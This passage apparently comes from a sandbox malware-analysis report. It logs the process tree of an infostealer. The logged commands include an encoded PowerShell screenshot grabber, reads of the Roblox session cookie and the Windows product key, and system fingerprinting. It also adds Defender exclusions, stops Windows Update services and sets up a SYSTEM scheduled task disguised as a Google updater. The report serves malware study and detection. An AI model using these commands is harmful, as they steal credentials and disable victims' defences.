ACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                              8⤵
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:5108
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                9⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4508
                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wp5exeyj\wp5exeyj.cmdline"
                                                                                                                                  10⤵
                                                                                                                                    PID:5388
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9DC6.tmp" "c:\Users\Admin\AppData\Local\Temp\wp5exeyj\CSC6016A9384E6543419633C1324E78EB3.TMP"
                                                                                                                                      11⤵
                                                                                                                                        PID:5452
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                  8⤵
                                                                                                                                    PID:4152
                                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                                      tree /A /F
                                                                                                                                      9⤵
                                                                                                                                        PID:4544
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                      8⤵
                                                                                                                                        PID:5212
                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                          tree /A /F
                                                                                                                                          9⤵
                                                                                                                                            PID:5360
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                          8⤵
                                                                                                                                            PID:5476
                                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                                              tree /A /F
                                                                                                                                              9⤵
                                                                                                                                                PID:5576
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                              8⤵
                                                                                                                                                PID:5648
                                                                                                                                                • C:\Windows\system32\tree.com
                                                                                                                                                  tree /A /F
                                                                                                                                                  9⤵
                                                                                                                                                    PID:5684
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:5696
                                                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                                                      tree /A /F
                                                                                                                                                      9⤵
                                                                                                                                                        PID:5720
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:5960
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                          9⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:5984
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                        8⤵
                                                                                                                                                          PID:6112
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                            9⤵
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:6132
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                          8⤵
                                                                                                                                                            PID:5140
                                                                                                                                                            • C:\Windows\system32\getmac.exe
                                                                                                                                                              getmac
                                                                                                                                                              9⤵
                                                                                                                                                                PID:4544
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39402\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\HzJKa.zip" *"
                                                                                                                                                              8⤵
                                                                                                                                                                PID:5156
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI39402\rar.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\_MEI39402\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\HzJKa.zip" *
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:4776
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:4748
                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                    wmic os get Caption
                                                                                                                                                                    9⤵
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4836
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:4568
                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                      wmic computersystem get totalphysicalmemory
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:5372
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:5212
                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                          wmic csproduct get uuid
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:5464
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:4904
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                              9⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:5200
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:5536
                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                wmic path win32_VideoController get name
                                                                                                                                                                                9⤵
                                                                                                                                                                                • Detects videocard installed
                                                                                                                                                                                PID:1184
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:4376
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                  9⤵
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:2120
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:3804
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:5144
                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                        sc stop UsoSvc
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:5260
                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                        sc stop WaaSMedicSvc
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:5204
                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                        sc stop wuauserv
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:5224
                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                        sc stop bits
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:3148
                                                                                                                                                                      • C:\Windows\System32\sc.exe
                                                                                                                                                                        sc stop dosvc
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:3156
                                                                                                                                                                    • C:\Windows\System32\dialer.exe
                                                                                                                                                                      C:\Windows\System32\dialer.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2960
                                                                                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                                                                                        C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2900
                                                                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                                                                          C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                          PID:4776
                                                                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                                                                          C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2580
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                            PID:5124
                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4928
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5784
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:5300
                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                    sc stop UsoSvc
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:5776
                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                    sc stop WaaSMedicSvc
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:5532
                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                    sc stop wuauserv
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:3620
                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                    sc stop bits
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:5196
                                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                                    sc stop dosvc
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:5852
                                                                                                                                                                                • C:\Windows\System32\dialer.exe
                                                                                                                                                                                  C:\Windows\System32\dialer.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3472
                                                                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                    C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                    PID:5548
                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5412
                                                                                                                                                                                    • C:\Windows\System32\dialer.exe
                                                                                                                                                                                      C:\Windows\System32\dialer.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:3640
                                                                                                                                                                                      • C:\Windows\System32\dialer.exe
                                                                                                                                                                                        C:\Windows\System32\dialer.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4144
                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3684
                                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:3872
                                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Suspicious use of UnmapMainImage
                                                                                                                                                                                            PID:4044
                                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4028
                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1248
                                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4080
                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2208
                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                    PID:4120
                                                                                                                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:2356
                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:3300
                                                                                                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                        PID:4132
                                                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:4160
                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:3516
                                                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:1632
                                                                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5000
                                                                                                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                PID:1176
                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:2212
                                                                                                                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                  PID:216
                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                  PID:5496
                                                                                                                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5604
                                                                                                                                                                                                                  • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                    C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4360
                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:436
                                                                                                                                                                                                                      • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                                                                                        C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4396
                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                          PID:5216
                                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
